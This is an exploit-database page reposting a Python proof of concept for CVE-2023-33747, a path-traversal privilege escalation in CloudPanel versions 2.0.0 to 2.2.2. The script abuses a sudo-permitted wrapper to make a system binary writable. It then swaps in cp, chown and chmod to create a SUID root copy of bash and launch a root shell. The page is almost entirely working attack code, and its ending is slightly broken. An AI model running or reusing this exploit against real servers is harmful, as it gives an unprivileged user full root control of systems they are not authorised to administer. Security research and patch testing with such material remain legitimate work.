CloudPanel 2.2.2 Privilege Escalation / Path Traversal

CVE Category Price Severity
CVE-2023-33747 CWE-22 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-06-07
Our sensors found this exploit at:

Below is a copy:

CloudPanel 2.2.2 Privilege Escalation / Path Traversal
# Title : Privilege Escalation through path traversal
# CVE ID : CVE-2023-33747
# Exploit Author : EagleEye
# Github :
# Version Affected : CloudPanel v2.0.0 - v2.2.2
# Vendor :
# Date : 31/05/2023 , 12:00 PM
# Step : Login as ssh as user, and run `python3`
# Date : 06 June 2023

import os
import subprocess

def exec_command(command):
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output, error = process.communicate()

def exploit():
print('[+] Overriding file to writable')
exec_command('sudo /usr/bin/clpctlWrapper system:permissions:reset --files=777 --path=../../../../../../../../../../usr/bin/clpctlWrapper')
print('[+] Backup clpctlWrapper into tmp...')
exec_command('cp /usr/bin/clpctlWrapper /tmp/clpctlWrapper')
print('[+] Replacing clpctlWrapper with cp...')
exec_command('cp /bin/bash /tmp/bash')
print('[+] Assigning suid to /tmp/bash...')
exec_command('cp /bin/chown /usr/bin/clpctlWrapper')
exec_command('sudo /usr/bin/clpctlWrapper root:root /tmp/bash')
exec_command('cp /bin/chmod /usr/bin/clpctlWrapper')
exec_command('sudo /usr/bin/clpctlWrapper 6755 /tmp/bash')
exec_command('cp /tmp/clpctlWrapper /usr/bin/clpctlWrapper')
print('[+] Popping root shell...')
os.system('/tmp/bash -p -c "chown root:root /usr/bin/clpctlWrapper && chmod 0700 /usr/bin/clpctlWrapper && python3"')

if __name__ == '__main__':

import os

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.